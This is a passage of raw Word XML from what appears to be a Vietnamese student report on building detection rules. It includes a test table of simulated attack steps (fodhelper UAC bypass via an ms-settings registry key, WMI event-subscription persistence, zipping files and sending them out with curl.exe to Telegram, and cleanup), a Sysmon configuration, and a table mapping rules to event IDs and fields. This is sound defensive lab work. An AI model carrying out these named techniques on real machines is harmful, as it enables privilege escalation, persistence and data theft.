        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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62BF27F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S1+S2 fire trong 1 phút</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="69CE9D6B" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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A8E7986" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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6D8F25A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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BD65D61" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reg add ms-settings + fodhelper.exe + cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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9C947A6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1 sequence fire (30s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="00E728F4" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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67A0436" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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2006C81" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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54F3F04" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Set-WmiInstance Filter+Consumer+Binding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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C317877" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 sequence fire (30s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="23663D04" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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F1AC333" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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00BF5BF7" w14:textId="0A57B619" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3,S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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837C8E7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Start-Process notepad.exe (kích hoạt WMI subscription)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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F232C46" w14:textId="76D10FD7" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3+S3 fire (30s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="678018AC" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="740"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43F9626" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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6700586" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4,S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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290B7BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Copy-Item + Compress-Archive + curl.exe Telegram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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4E53071" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4+S4 fire (2m)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6CE01B77" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="740"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83F631B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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2C9CB30" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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284DC1C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remove-Item staging + zip (sau khi network event)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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DFCF8C2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5 fire (120s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35435B75" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74185A90" w14:textId="7EB5AA47" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phụ lục B — Sysmon Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65574175" w14:textId="0EADEF54" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>File cấu hình Sysmon được sử dụng trong đồ án (sysmon-config.xml). Áp dụng bằng lệnh: sysmon64.exe -c sysmon-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F770064" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356E2D4"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&lt;Sysmon schemaversion="4.90"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748CB6F"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&lt;HashAlgorithms&gt;md5,sha256,imphash&lt;/HashAlgorithms&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB15B3B"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&lt;CheckRevocation&gt;False&lt;/CheckRevocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505D49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&lt;EventFiltering&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB90C34"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 ProcessCreate (EID 1): log all, exclude conhost --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351609F2"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&lt;ProcessCreate onmatch="exclude"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298867D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&lt;Image condition="is"&gt;C:\Windows\System32\conhost.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7104CEF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&lt;/ProcessCreate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085B3F9"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 FileCreate (EID 11): staging paths + script/archive exts --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04563F3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&lt;FileCreate onmatch="include"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC4AA39"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&lt;TargetFilename condition="contains"&gt;\Windows\Temp\wdmp&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C34D3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&lt;TargetFilename condition="end with"&gt;.zip&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975D7DF"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&lt;TargetFilename condition="end with"&gt;.ps1&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E77C40"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&lt;/FileCreate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03966EDB"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 NetworkConnect (EID 3): log all --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27859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&lt;NetworkConnect onmatch="exclude"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D27B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 RegistryEvent (EID 13): log all --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35291E86"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&lt;RegistryEvent onmatch="exclude"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584D75F"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 WmiEvent (EID 19/20/21): log all --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5446FF1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&lt;WmiEvent onmatch="exclude"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B45225"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 FileDelete (EID 23): staging paths --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC031E8"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&lt;FileDelete onmatch="include"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A474A4D"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&lt;TargetFilename condition="contains"&gt;\Temp\&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA4E9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&lt;TargetFilename condition="end with"&gt;.zip&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA55F1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&lt;TargetFilename condition="end with"&gt;.save&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E5277"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&lt;TargetFilename condition="end with"&gt;.ps1&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEA043"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&lt;/FileDelete&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186D5BA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/EventFiltering&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1FA90" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;/Sysmon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B656C8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C003C3" w14:textId="76EE1A6A" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phụ lục </w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Bảng Ánh Xạ Rule — Event ID — Field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
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="2562"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2762"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="54476F01" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666"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365D4747" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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338436CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562"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72371F4D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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47B8BC17" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2762" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1514A695" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mô tả detection logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5659C8D1" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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37A6123" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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8ED6B83" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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742345D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>registry.path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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1DFC154" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>*ms-settings*Shell*command*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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008A2C9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Registry hijack — invariant T1548.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="055ACB09" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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D79E4EC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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58501A42" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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40C3EBB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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4CF3CDD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fodhelper.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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0D5EB538" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UAC trigger process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="080CB87D" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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72BD9C3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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84DB7E0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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893E265" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.parent.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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C61043F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fodhelper.exe OR wscript.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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0ECD0A3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Shell spawned from elevated context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="204F79CD" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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B0E3A85" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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BE7F97A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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D5A8C39" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_data.Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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05C22474" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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03FD1D08" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Filter creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2842DE4A" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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400624D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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DC7D99F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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6F484B3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_data.Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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D939BFF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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2D45EBB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Consumer creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6A182D76" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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85672C3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
